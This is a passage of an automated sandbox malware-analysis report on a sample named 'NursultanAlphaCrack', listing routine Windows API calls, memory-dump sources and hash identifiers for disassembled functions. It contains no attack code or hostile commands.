                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: EnvironmentVariable
                                                                                        • String ID: sfxcmd$sfxpar
                                                                                        • API String ID: 1431749950-3493335439
                                                                                        • Opcode ID: b1206c3547104c31eebc6d7f23ff7759b142409e78409c872914efd0144dba58
                                                                                        • Instruction ID: 2c3aba76f04c75a412bafd557e263a5e8ebb1b585528f2d586dd4cdba4d59a80
                                                                                        • Opcode Fuzzy Hash: b1206c3547104c31eebc6d7f23ff7759b142409e78409c872914efd0144dba58
                                                                                        • Instruction Fuzzy Hash: 08F0ECB24182287BCB212F949C06FFA3B58AF14781F040416FE8596251D7B09980D6B0

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1082 1c9785-1c9791 1083 1c979e-1c97b5 ReadFile 1082->1083 1084 1c9793-1c979b GetStdHandle 1082->1084 1085 1c97b7-1c97c0 call 1c98bc 1083->1085 1086 1c9811 1083->1086 1084->1083 1090 1c97d9-1c97dd 1085->1090 1091 1c97c2-1c97ca 1085->1091 1088 1c9814-1c9817 1086->1088 1092 1c97ee-1c97f2 1090->1092 1093 1c97df-1c97e8 GetLastError 1090->1093 1091->1090 1094 1c97cc 1091->1094 1097 1c980c-1c980f 1092->1097 1098 1c97f4-1c97fc 1092->1098 1093->1092 1096 1c97ea-1c97ec 1093->1096 1095 1c97cd-1c97d7 call 1c9785 1094->1095 1095->1088 1096->1088 1097->1088 1098->1097 1100 1c97fe-1c9807 GetLastError 1098->1100 1100->1097 1102 1c9809-1c980a 1100->1102 1102->1095
                                                                                        APIs
                                                                                        • GetStdHandle.KERNEL32(000000F6), ref: 001C9795
                                                                                        • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 001C97AD
                                                                                        • GetLastError.KERNEL32 ref: 001C97DF
                                                                                        • GetLastError.KERNEL32 ref: 001C97FE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$FileHandleRead
                                                                                        • String ID:
                                                                                        • API String ID: 2244327787-0
                                                                                        • Opcode ID: 55b258f9a661f87c3eb4b969d3dede887ea97487de8b342aba0d475418ec35a0
                                                                                        • Instruction ID: 66901646bbf471dfdb62fa4aecbdbe87ca96a36400226c79e25ebb2e1318e66e
                                                                                        • Opcode Fuzzy Hash: 55b258f9a661f87c3eb4b969d3dede887ea97487de8b342aba0d475418ec35a0
                                                                                        • Instruction Fuzzy Hash: 14117C71910308EBDF205F64C808F6977A9BB62320F10892EF42686590DB74DE84DB61
                                                                                        APIs
                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,001CD710,00000000,00000000,?,001EACDB,001CD710,00000000,00000000,00000000,?,001EAED8,00000006,FlsSetValue), ref: 001EAD66
                                                                                        • GetLastError.KERNEL32(?,001EACDB,001CD710,00000000,00000000,00000000,?,001EAED8,00000006,FlsSetValue,001F7970,FlsSetValue,00000000,00000364,?,001E98B7), ref: 001EAD72
                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,001EACDB,001CD710,00000000,00000000,00000000,?,001EAED8,00000006,FlsSetValue,001F7970,FlsSetValue,00000000), ref: 001EAD80
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: LibraryLoad$ErrorLast
                                                                                        • String ID:
                                                                                        • API String ID: 3177248105-0
                                                                                        • Opcode ID: dc00ae8801858fc52d7d8fc9ee83308478a009e2755698518ba82c19779cf6ef
                                                                                        • Instruction ID: 6160d771bd8ccef5dbf81d4da642c7ca601d6f0741c05561e04d4299b6f0866d
                                                                                        • Opcode Fuzzy Hash: dc00ae8801858fc52d7d8fc9ee83308478a009e2755698518ba82c19779cf6ef
                                                                                        • Instruction Fuzzy Hash: 2E012036201672BBC7314BEADC449AFBF58FF057637550620F91AD3950D721E841C6E1
                                                                                        APIs
                                                                                        • GetStdHandle.KERNEL32(000000F5,?,?,?,?,001CD343,00000001,?,?,?,00000000,001D551D,?,?,?), ref: 001C9F9E
                                                                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,001D551D,?,?,?,?,?,001D4FC7,?), ref: 001C9FE5
                                                                                        • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,001CD343,00000001,?,?), ref: 001CA011
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileWrite$Handle
                                                                                        • String ID:
                                                                                        • API String ID: 4209713984-0
                                                                                        • Opcode ID: a0c972e8f39059f32b6a920fa7d0ec61179484b58887ff1c50b2d97ab97238c8
                                                                                        • Instruction ID: 9deccfc82cc79dfc4938fa8164c7e6b1e948da52678f1ded46b06e60be15cdac
                                                                                        • Opcode Fuzzy Hash: a0c972e8f39059f32b6a920fa7d0ec61179484b58887ff1c50b2d97ab97238c8
                                                                                        • Instruction Fuzzy Hash: F131BE31204309AFDB15CF20D819F6A7BA5EFA4755F00461DF8819B290CB75ED98CBA2
                                                                                        APIs
                                                                                          • Part of subcall function 001CC27E: _wcslen.LIBCMT ref: 001CC284
                                                                                        • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,001CA175,?,00000001,00000000,?,?), ref: 001CA2D9
                                                                                        • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,001CA175,?,00000001,00000000,?,?), ref: 001CA30C
                                                                                        • GetLastError.KERNEL32(?,?,?,?,001CA175,?,00000001,00000000,?,?), ref: 001CA329
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateDirectory$ErrorLast_wcslen
                                                                                        • String ID:
                                                                                        • API String ID: 2260680371-0
                                                                                        • Opcode ID: 86f992fbaa6e2b9b0e2352b41320cc96e62d98afa7253a0250c20a3384d5deee
                                                                                        • Instruction ID: 55bfb2a58ab09150aa4b5203ea10daaa4b798a02ae28fb859b310822ef080af0
                                                                                        • Opcode Fuzzy Hash: 86f992fbaa6e2b9b0e2352b41320cc96e62d98afa7253a0250c20a3384d5deee
                                                                                        • Instruction Fuzzy Hash: 6C0128312002686AEF23ABB04C59FFD3748AF39789F84041DF901D6181DB54CA81C7B2
                                                                                        APIs
                                                                                        • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 001EB8B8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: Info
                                                                                        • String ID:
                                                                                        • API String ID: 1807457897-3916222277
                                                                                        • Opcode ID: 9d801a6414fdbcd374c45e94f6135950154b99a878a77aead8a622db59666fce
                                                                                        • Instruction ID: 6462c3b4d0f370ada5efd22d3b9539f7f13fa0a220bcb7f7cb207872c0725f22
                                                                                        • Opcode Fuzzy Hash: 9d801a6414fdbcd374c45e94f6135950154b99a878a77aead8a622db59666fce
                                                                                        • Instruction Fuzzy Hash: 5741F7B05086CC9ADF258E668CC4BFBBBA9DB55308F1404EDE6DA87143D335AA45CB60
                                                                                        APIs
                                                                                        • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,?), ref: 001EAFDD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: String
                                                                                        • String ID: LCMapStringEx
                                                                                        • API String ID: 2568140703-3893581201
                                                                                        • Opcode ID: 7bcb2efd6cc048d7297a7a81d2d4a25671ed8a0ab869f56578d4681767ff59ee
                                                                                        • Instruction ID: dda8db9e50c914455d8f9f11208ff6e5dd8c31d60ae3a013129429756fa68e80
                                                                                        • Opcode Fuzzy Hash: 7bcb2efd6cc048d7297a7a81d2d4a25671ed8a0ab869f56578d4681767ff59ee
                                                                                        • Instruction Fuzzy Hash: 9701133250420EBBCF12AF91DC02DAE7F62EF08764F414155FE1426160CB729A71EB81
                                                                                        APIs
                                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,001EA56F), ref: 001EAF55
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: CountCriticalInitializeSectionSpin
                                                                                        • String ID: InitializeCriticalSectionEx
                                                                                        • API String ID: 2593887523-3084827643
                                                                                        • Opcode ID: eaf310d281594462eb37ccad36fa00e69206e8229b959cd8bd699de76f107416
                                                                                        • Instruction ID: 10f500c328716fcd60dd9649464b0409fac511c2c4fcf269176723d099708893
                                                                                        • Opcode Fuzzy Hash: eaf310d281594462eb37ccad36fa00e69206e8229b959cd8bd699de76f107416
                                                                                        • Instruction Fuzzy Hash: C7F0BE3164520CBBCF126F61CC02CBEBFA1EF14B21B404169FD199A2A0DB715E21DB86
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: Alloc
                                                                                        • String ID: FlsAlloc
                                                                                        • API String ID: 2773662609-671089009
                                                                                        • Opcode ID: bddbb97c1389157a6654c4b8e39f084bb360eaed114e9e5791c21185d79faba9
                                                                                        • Instruction ID: b7b5e6373bcc9912ee28020ff21e854b93bedc23b457a49295060a793a7d969f
                                                                                        • Opcode Fuzzy Hash: bddbb97c1389157a6654c4b8e39f084bb360eaed114e9e5791c21185d79faba9
                                                                                        • Instruction Fuzzy Hash: 8EE0E531A4521C7BC711ABA6DC0297EBB98EF14B31B414199F90597290CFB16E81C6D6
                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 001DE1E3
                                                                                          • Part of subcall function 001DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001DE8D0
                                                                                          • Part of subcall function 001DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001DE8E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID: I=u
                                                                                        • API String ID: 1269201914-3032091488
                                                                                        • Opcode ID: 79cfb00ab5945ab49fb9ad11da68788af31caeb5576ccfd7e9aa56538d7de619
                                                                                        • Instruction ID: 597db27682415b3b4ab63ecd7f867e0fe3d6d443623e6daac7664f4fb215560a
                                                                                        • Opcode Fuzzy Hash: 79cfb00ab5945ab49fb9ad11da68788af31caeb5576ccfd7e9aa56538d7de619
                                                                                        • Instruction Fuzzy Hash: AEB012D5368144BC310871892D02C37014CC0C1B22330C43FFC05C8580DA40BC102C71
                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 001DE1E3
                                                                                          • Part of subcall function 001DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001DE8D0
                                                                                          • Part of subcall function 001DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001DE8E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID: I=u
                                                                                        • API String ID: 1269201914-3032091488
                                                                                        • Opcode ID: 564ac8a4b59706f6d8ee7aba309f5136b370313d13d28c149b9d66d61e8d6c9e
                                                                                        • Instruction ID: 9a4d1b2e89b419ad9ac5dad268b0d49172aff82edf776768391a7a3438d0e31a
                                                                                        • Opcode Fuzzy Hash: 564ac8a4b59706f6d8ee7aba309f5136b370313d13d28c149b9d66d61e8d6c9e
                                                                                        • Instruction Fuzzy Hash: 9DB012D2368044BC3108B2492D02C37018CC0C1B22330C03FFC09C8380DA40BC142871
                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 001DE1E3
                                                                                          • Part of subcall function 001DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001DE8D0
                                                                                          • Part of subcall function 001DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001DE8E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID: I=u
                                                                                        • API String ID: 1269201914-3032091488
                                                                                        • Opcode ID: 198457c63927fc9a6dfa78fd265de254db6e62e17912d8a99d285d56ce7f4be6
                                                                                        • Instruction ID: 85f1e9951139f7930e335f6e3c76ea11c9f4daf751a276ff3f29514d8281a237
                                                                                        • Opcode Fuzzy Hash: 198457c63927fc9a6dfa78fd265de254db6e62e17912d8a99d285d56ce7f4be6
                                                                                        • Instruction Fuzzy Hash: 05B012D536C148BC3108B18D2D02C37018CC0C0B22330803FF809C8280DA407C102D71
                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 001DE1E3
                                                                                          • Part of subcall function 001DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001DE8D0
                                                                                          • Part of subcall function 001DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001DE8E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID: I=u
                                                                                        • API String ID: 1269201914-3032091488
                                                                                        • Opcode ID: 4e3ea25d5122a65c378d25069cb3e5ec50032186a1c2716e25a89d2fa670e24a
                                                                                        • Instruction ID: be3d94b1dd464d1ca2e9ee796a0f99fe5b49cd25377a4af0e5bda8de16b99c12
                                                                                        • Opcode Fuzzy Hash: 4e3ea25d5122a65c378d25069cb3e5ec50032186a1c2716e25a89d2fa670e24a
                                                                                        • Instruction Fuzzy Hash: 0AB012E1368044BC3108B1492D02D37018CC0C1F32330C03FFD09C8280DA40BD102871
                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 001DE1E3
                                                                                          • Part of subcall function 001DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001DE8D0
                                                                                          • Part of subcall function 001DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001DE8E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID: I=u
                                                                                        • API String ID: 1269201914-3032091488
                                                                                        • Opcode ID: 8895401299a0c517f28c2249887c3e7d7f6310af39766a6c722e19aa21882ad9
                                                                                        • Instruction ID: 5abc263c5fa9b0f19f29feb3b1316905af7753afa05237af86e2c23f09f0fd5e
                                                                                        • Opcode Fuzzy Hash: 8895401299a0c517f28c2249887c3e7d7f6310af39766a6c722e19aa21882ad9
                                                                                        • Instruction Fuzzy Hash: 78B012D2368044BC3108B2492E03C37018CC0C0B22330C03FF809C8380DE517D192871
                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 001DE1E3
                                                                                          • Part of subcall function 001DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001DE8D0
                                                                                          • Part of subcall function 001DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001DE8E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID: I=u
                                                                                        • API String ID: 1269201914-3032091488
                                                                                        • Opcode ID: 80c3394fcd9cd9833a2739c9e6ed7f1590de42956114aab3cb9af0d621224ee8
                                                                                        • Instruction ID: f9355515cd43031f86ae49a35d0108fe12598b2ebf42aef3e866f22af026f641
                                                                                        • Opcode Fuzzy Hash: 80c3394fcd9cd9833a2739c9e6ed7f1590de42956114aab3cb9af0d621224ee8
